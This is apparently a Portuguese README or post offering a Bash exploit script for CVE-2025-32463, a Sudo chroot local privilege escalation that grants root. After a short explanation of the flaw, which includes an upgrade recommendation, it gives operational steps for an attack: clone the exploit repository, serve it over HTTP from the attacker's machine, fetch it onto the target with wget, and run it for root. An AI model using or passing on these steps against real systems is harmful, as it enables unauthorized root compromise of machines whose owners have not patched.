
Script de exploit Bash para CVE-2025-32463, uma vulnerabilidade de escalonamento local de privilégios no Sudo 1.9.17 via opção chroot, permitindo acesso root em sistemas afetados.
A versão 1.9.17 do Sudo possui uma vulnerabilidade crítica (CVE-2025-32463) que permite que usuários locais obtenham acesso root ao explorar a opção chroot, o que pode levar a sérios riscos de segurança. Recomenda-se que os usuários atualizem para a versão 1.9.17p1 ou posterior para mitigar esse problema.
Visão geral da vulnerabilidade do Sudo 1.9.17:-
A vulnerabilidade na versão 1.9.17 do Sudo, identificada como CVE-2025-32463, é uma falha crítica que permite que usuários locais obtenham acesso root. Esse problema surge de uma alteração na forma como o Sudo lida com a opção --chroot (-R), que tem a finalidade de isolar processos alterando seu diretório raiz.
Como a vulnerabilidade funciona:-
Problema de resolução de caminho: Nas versões 1.9.14 a 1.9.17, o Sudo avalia a opção --chroot antes de verificar as permissões do usuário. Isso permite que atacantes controlem o ambiente e carreguem bibliotecas maliciosas.
Etapas de exploração:
Um atacante cria um arquivo nsswitch.conf malicioso em um diretório que controla. Ele executa o Sudo com a opção -R, fazendo com que o Sudo carregue a configuração e as bibliotecas do atacante, concedendo acesso root.
Eu criei um script bash "cwoot.sh" que, após a execução, eleva diretamente para o usuário root.
Faça o seguinte:
Baixe o script do repositório: git clone https://github.com/justjoeyking/CVE-2025-32463.git
Na sua própria máquina: python3 -m http.server 8080
Na máquina alvo: wget http://<own_IP_address>:8080/cwoot.sh
Na máquina alvo: chmod 755 cwoot.sh
Execute o script na máquina alvo: ./cwoot.sh